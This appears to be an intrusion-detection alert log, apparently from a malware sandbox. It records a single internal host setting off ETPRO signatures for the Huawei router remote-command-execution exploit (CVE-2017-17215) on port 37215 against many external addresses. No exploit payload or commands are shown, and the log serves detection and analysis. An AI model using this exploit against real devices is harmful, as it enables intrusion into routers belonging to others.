                                                        06/13/24-21:32:34.199473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137837215192.168.2.14156.146.176.98
                                                        06/13/24-21:32:42.421138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882837215192.168.2.1441.72.30.70
                                                        06/13/24-21:32:32.156163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304437215192.168.2.1441.59.177.33
                                                        06/13/24-21:32:05.347501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457837215192.168.2.1441.35.122.26
                                                        06/13/24-21:32:50.630202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956437215192.168.2.14197.177.15.199
                                                        06/13/24-21:33:05.014481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040637215192.168.2.1441.140.251.132
                                                        06/13/24-21:32:38.298441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146037215192.168.2.14197.126.142.227
                                                        06/13/24-21:33:17.306868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080037215192.168.2.1441.107.242.74
                                                        06/13/24-21:32:05.369523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755637215192.168.2.1441.46.0.111
                                                        06/13/24-21:32:17.697202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211837215192.168.2.14156.23.48.106
                                                        06/13/24-21:32:23.943855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511237215192.168.2.14197.61.243.252
                                                        06/13/24-21:33:15.275288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703637215192.168.2.14197.226.73.205
                                                        06/13/24-21:32:48.569952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379037215192.168.2.14156.78.79.225
                                                        06/13/24-21:33:17.305015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097037215192.168.2.14156.252.111.195
                                                        06/13/24-21:32:30.098205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065237215192.168.2.14197.219.220.162
                                                        06/13/24-21:32:21.785430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897437215192.168.2.1441.87.97.4
                                                        06/13/24-21:32:52.678958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777637215192.168.2.14197.197.78.241
                                                        06/13/24-21:32:23.834983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803637215192.168.2.14197.10.127.67
                                                        06/13/24-21:32:07.403213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032837215192.168.2.14156.87.157.53
                                                        06/13/24-21:32:40.356729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543237215192.168.2.14197.132.204.45
                                                        06/13/24-21:32:30.074072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568037215192.168.2.14197.95.90.253
                                                        06/13/24-21:32:38.318797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569637215192.168.2.14156.116.132.111
                                                        06/13/24-21:33:11.158249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103837215192.168.2.1441.225.17.244
                                                        06/13/24-21:32:28.028299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758837215192.168.2.14156.23.3.206
                                                        06/13/24-21:32:34.212752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283037215192.168.2.14197.137.191.247
                                                        06/13/24-21:32:05.348831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673437215192.168.2.1441.55.64.243
                                                        06/13/24-21:32:58.821023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489837215192.168.2.14156.152.88.128
                                                        06/13/24-21:32:42.421822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850637215192.168.2.14197.190.244.27
                                                        06/13/24-21:33:02.909085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593037215192.168.2.14197.92.121.38
                                                        06/13/24-21:32:38.302763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388837215192.168.2.1441.46.78.44
                                                        06/13/24-21:32:32.156072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4027637215192.168.2.14197.62.69.176
                                                        06/13/24-21:32:36.246388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167637215192.168.2.14156.196.138.253
                                                        06/13/24-21:32:58.824923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858437215192.168.2.1441.202.160.48
                                                        06/13/24-21:32:01.224908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4789637215192.168.2.14197.234.225.61
                                                        06/13/24-21:32:54.707615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4725637215192.168.2.14197.138.63.204
                                                        06/13/24-21:32:46.508581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330637215192.168.2.14197.213.177.220
                                                        06/13/24-21:32:11.508436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726637215192.168.2.14156.90.102.52
                                                        06/13/24-21:32:40.358781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582637215192.168.2.14156.147.130.92
                                                        06/13/24-21:32:30.074676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984437215192.168.2.1441.38.134.140
                                                        06/13/24-21:32:36.243806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989837215192.168.2.14197.159.30.154
                                                        06/13/24-21:32:56.791614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379437215192.168.2.14197.202.147.94
                                                        06/13/24-21:33:09.127442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3509837215192.168.2.14197.199.84.86
                                                        06/13/24-21:32:50.629935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042637215192.168.2.14156.138.46.169
                                                        06/13/24-21:32:07.415721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045637215192.168.2.14156.204.102.65
                                                        06/13/24-21:32:11.488548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323037215192.168.2.14156.183.75.88
                                                        06/13/24-21:32:25.971285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631037215192.168.2.1441.136.87.106
                                                        06/13/24-21:32:19.731542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484837215192.168.2.1441.137.229.255
                                                        06/13/24-21:33:00.885281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108637215192.168.2.14197.124.108.206
                                                        06/13/24-21:32:46.525374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3820037215192.168.2.1441.89.162.3
                                                        06/13/24-21:32:50.633348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544637215192.168.2.14156.39.227.203
                                                        06/13/24-21:32:40.357478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717237215192.168.2.1441.44.149.152
                                                        06/13/24-21:33:15.256868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851437215192.168.2.14197.6.92.4
                                                        06/13/24-21:32:13.570311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695837215192.168.2.14197.13.28.12
                                                        06/13/24-21:32:25.996743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412837215192.168.2.14156.58.90.69
                                                        06/13/24-21:33:04.992238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492237215192.168.2.14156.165.75.175
                                                        06/13/24-21:33:00.870073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3319237215192.168.2.14197.202.68.167
                                                        06/13/24-21:32:30.126440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938837215192.168.2.14156.116.129.42
                                                        06/13/24-21:32:28.029032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108637215192.168.2.1441.60.128.173
                                                        06/13/24-21:32:11.509353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892837215192.168.2.14197.214.224.32
                                                        06/13/24-21:32:46.527539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626837215192.168.2.1441.86.146.29
                                                        06/13/24-21:33:09.091001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486237215192.168.2.14197.107.170.77
                                                        06/13/24-21:32:25.974115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407837215192.168.2.14197.164.35.212
                                                        06/13/24-21:32:23.929860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173437215192.168.2.1441.223.30.178
                                                        06/13/24-21:33:13.213598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863837215192.168.2.14197.189.186.228
                                                        06/13/24-21:32:36.246287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669837215192.168.2.14156.117.150.168
                                                        06/13/24-21:33:11.160134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990237215192.168.2.14156.192.32.39
                                                        06/13/24-21:33:13.227610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126837215192.168.2.14197.229.127.167
                                                        06/13/24-21:32:34.196562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873437215192.168.2.14197.29.228.104
                                                        06/13/24-21:32:32.164336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634237215192.168.2.14156.139.167.129
                                                        06/13/24-21:31:59.173835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063037215192.168.2.14197.126.143.178
                                                        06/13/24-21:32:48.551408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490837215192.168.2.1441.161.136.141
                                                        06/13/24-21:32:34.214056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246837215192.168.2.14156.189.191.174
                                                        06/13/24-21:32:46.523917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646637215192.168.2.14156.91.29.168
                                                        06/13/24-21:32:46.508558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317437215192.168.2.14156.16.46.42
                                                        06/13/24-21:32:01.223433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406037215192.168.2.14197.6.59.7
                                                        06/13/24-21:32:34.191584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096437215192.168.2.14156.183.171.237
                                                        06/13/24-21:31:59.198778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886837215192.168.2.14197.103.31.12
                                                        06/13/24-21:33:17.308388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909637215192.168.2.14197.95.184.69
                                                        06/13/24-21:32:01.238447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390437215192.168.2.14197.44.84.112
                                                        06/13/24-21:32:36.242141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089237215192.168.2.14197.95.239.179
                                                        06/13/24-21:31:59.195887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418837215192.168.2.1441.30.13.4
                                                        06/13/24-21:32:28.042921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177637215192.168.2.14156.78.29.166
                                                        06/13/24-21:32:23.940403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710237215192.168.2.14197.30.133.183
                                                        06/13/24-21:32:48.568511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894237215192.168.2.14197.124.124.158
                                                        06/13/24-21:33:17.303933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4241237215192.168.2.14156.127.52.63
                                                        06/13/24-21:32:09.440601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445037215192.168.2.14197.227.189.239
                                                        06/13/24-21:32:09.458032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6027837215192.168.2.1441.249.62.64
                                                        06/13/24-21:32:19.730021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5036637215192.168.2.1441.86.171.169
                                                        06/13/24-21:32:17.677771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004437215192.168.2.14156.145.82.15
                                                        06/13/24-21:33:00.871960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641037215192.168.2.1441.197.49.81
                                                        06/13/24-21:32:30.080046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916437215192.168.2.14156.249.247.71
                                                        06/13/24-21:32:46.528349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351437215192.168.2.14156.123.218.169
                                                        06/13/24-21:32:28.028349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097637215192.168.2.1441.33.100.218
                                                        06/13/24-21:32:30.098379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764237215192.168.2.14156.141.120.64
                                                        06/13/24-21:32:38.322270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577437215192.168.2.14156.153.224.165
                                                        06/13/24-21:32:50.632843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772837215192.168.2.14156.175.13.127
                                                        06/13/24-21:33:04.991316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271637215192.168.2.14197.239.79.240
                                                        06/13/24-21:32:05.347320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369437215192.168.2.1441.45.34.20
                                                        06/13/24-21:33:11.173402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032637215192.168.2.14156.168.76.132
                                                        06/13/24-21:32:07.403052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709237215192.168.2.14197.5.220.199
                                                        06/13/24-21:33:09.111794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740837215192.168.2.14197.202.78.215
                                                        06/13/24-21:32:56.758059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5549037215192.168.2.14156.158.99.231
                                                        06/13/24-21:32:32.153671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501637215192.168.2.1441.40.20.49
                                                        06/13/24-21:32:05.350232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668037215192.168.2.14197.7.222.118
                                                        06/13/24-21:32:17.679053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6075237215192.168.2.14156.156.170.187
                                                        06/13/24-21:32:21.803501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3796637215192.168.2.14197.43.120.137
                                                        06/13/24-21:32:09.460045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864237215192.168.2.14156.71.54.76
                                                        06/13/24-21:33:09.108646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267637215192.168.2.14156.31.183.156
                                                        06/13/24-21:32:34.218194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538237215192.168.2.14156.62.94.110
                                                        06/13/24-21:32:05.350335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717637215192.168.2.14197.23.83.254
                                                        06/13/24-21:32:52.659362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530837215192.168.2.14197.225.121.24
                                                        06/13/24-21:32:19.730718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198437215192.168.2.1441.239.27.52
                                                        06/13/24-21:31:57.093372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618637215192.168.2.1441.8.44.210
                                                        06/13/24-21:33:11.173865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038037215192.168.2.1441.21.197.232
                                                        06/13/24-21:33:15.251922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570637215192.168.2.1441.33.155.82
                                                        06/13/24-21:32:05.377624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403637215192.168.2.1441.216.237.77
                                                        06/13/24-21:32:03.308885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832237215192.168.2.1441.127.240.66
                                                        06/13/24-21:32:01.241691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863237215192.168.2.14156.173.125.201
                                                        06/13/24-21:32:36.262602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617837215192.168.2.14197.186.114.130
                                                        06/13/24-21:33:11.155654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760637215192.168.2.1441.255.62.220
                                                        06/13/24-21:32:05.350737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3583437215192.168.2.1441.45.149.151
                                                        06/13/24-21:32:38.320505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908237215192.168.2.1441.253.94.175
                                                        06/13/24-21:33:11.177526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684837215192.168.2.14156.236.120.151
                                                        06/13/24-21:32:23.930728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999437215192.168.2.1441.184.76.191
                                                        06/13/24-21:32:25.973640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122637215192.168.2.14156.63.211.25
                                                        06/13/24-21:32:05.344557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4864237215192.168.2.14197.22.117.8
                                                        06/13/24-21:33:11.159516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235237215192.168.2.1441.107.108.138
                                                        06/13/24-21:32:23.944167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857437215192.168.2.14156.248.44.29
                                                        06/13/24-21:32:17.695989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573237215192.168.2.14156.189.122.81
                                                        06/13/24-21:32:09.439160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276837215192.168.2.1441.115.26.173
                                                        06/13/24-21:32:03.297525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689237215192.168.2.14156.245.123.173
                                                        06/13/24-21:33:04.990518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477437215192.168.2.1441.102.119.51
                                                        06/13/24-21:32:09.439668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102437215192.168.2.14156.13.255.82
                                                        06/13/24-21:32:44.477709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704037215192.168.2.1441.237.182.105
                                                        06/13/24-21:32:19.749930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091837215192.168.2.1441.144.113.214
                                                        06/13/24-21:32:03.308572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585037215192.168.2.14156.183.231.156
                                                        06/13/24-21:32:58.820774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863837215192.168.2.14197.203.107.191
                                                        06/13/24-21:32:23.940981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450237215192.168.2.14197.45.68.16
                                                        06/13/24-21:32:52.672187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074037215192.168.2.1441.12.242.144
                                                        06/13/24-21:32:13.565737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3556437215192.168.2.14197.153.145.147
                                                        06/13/24-21:32:19.728970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773437215192.168.2.14156.16.79.247
                                                        06/13/24-21:32:03.294622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539237215192.168.2.1441.160.163.109
                                                        06/13/24-21:32:32.152332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840037215192.168.2.14156.29.237.0
                                                        06/13/24-21:33:17.309520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168037215192.168.2.1441.201.28.48
                                                        06/13/24-21:33:00.867739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774437215192.168.2.1441.153.29.225
                                                        06/13/24-21:32:50.611350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033637215192.168.2.14197.155.88.138
                                                        06/13/24-21:32:03.275917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727837215192.168.2.1441.8.89.25
                                                        06/13/24-21:32:44.480028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.14156.165.244.72
                                                        06/13/24-21:32:03.306455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735837215192.168.2.14197.157.162.120
                                                        06/13/24-21:32:15.611217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4217037215192.168.2.14156.194.165.106
                                                        06/13/24-21:33:15.273693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424837215192.168.2.14156.15.244.234
                                                        06/13/24-21:32:01.222581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870437215192.168.2.14156.151.238.12
                                                        06/13/24-21:33:15.275680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065237215192.168.2.1441.86.237.112
                                                        06/13/24-21:32:52.659003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950037215192.168.2.14197.66.21.27
                                                        06/13/24-21:32:32.147906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958637215192.168.2.14156.231.111.8
                                                        06/13/24-21:32:28.027013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868837215192.168.2.14197.130.215.180
                                                        06/13/24-21:32:50.611209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234437215192.168.2.14197.74.188.20
                                                        06/13/24-21:32:05.347643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5082837215192.168.2.1441.55.103.22
                                                        06/13/24-21:33:11.157940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663637215192.168.2.1441.61.205.114
                                                        06/13/24-21:33:09.129512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5908237215192.168.2.14197.154.126.198
                                                        06/13/24-21:32:40.356560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995437215192.168.2.1441.142.73.253
                                                        06/13/24-21:32:07.417775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281637215192.168.2.14156.68.98.131
                                                        06/13/24-21:33:09.086821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019637215192.168.2.14197.38.38.33
                                                        06/13/24-21:32:05.369620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228237215192.168.2.14156.220.120.103
                                                        06/13/24-21:33:05.013906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465837215192.168.2.1441.191.72.76
                                                        06/13/24-21:32:11.486638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105437215192.168.2.14197.174.100.192
                                                        06/13/24-21:33:11.155954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3952837215192.168.2.14197.231.164.134
                                                        06/13/24-21:31:57.133909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309237215192.168.2.14197.2.208.45
                                                        06/13/24-21:32:01.223062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655637215192.168.2.1441.208.29.174
                                                        06/13/24-21:32:48.555752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359637215192.168.2.14156.247.133.239
                                                        06/13/24-21:32:48.573448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5178037215192.168.2.14156.28.151.124
                                                        06/13/24-21:33:07.055908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239237215192.168.2.14197.112.189.11
                                                        06/13/24-21:32:19.749466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854637215192.168.2.1441.210.203.218
                                                        06/13/24-21:32:17.694886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098437215192.168.2.14156.195.233.205
                                                        06/13/24-21:32:52.679712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397437215192.168.2.14156.157.135.95
                                                        06/13/24-21:32:11.489044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5000837215192.168.2.14156.15.215.115
                                                        06/13/24-21:32:13.547016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346637215192.168.2.14156.2.99.61
                                                        06/13/24-21:33:00.886610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615437215192.168.2.14156.51.52.90
                                                        06/13/24-21:32:25.974634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004437215192.168.2.1441.204.29.233
                                                        06/13/24-21:32:38.301447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431037215192.168.2.1441.236.221.103
                                                        06/13/24-21:32:54.708102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474637215192.168.2.14156.233.9.146
                                                        06/13/24-21:32:56.790395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130037215192.168.2.14197.44.206.116
                                                        06/13/24-21:32:03.301155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459837215192.168.2.1441.219.159.105
                                                        06/13/24-21:32:40.357976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5511437215192.168.2.1441.11.255.71
                                                        06/13/24-21:33:09.085629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857037215192.168.2.14156.21.47.82
                                                        06/13/24-21:33:04.991821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124837215192.168.2.14197.250.101.23
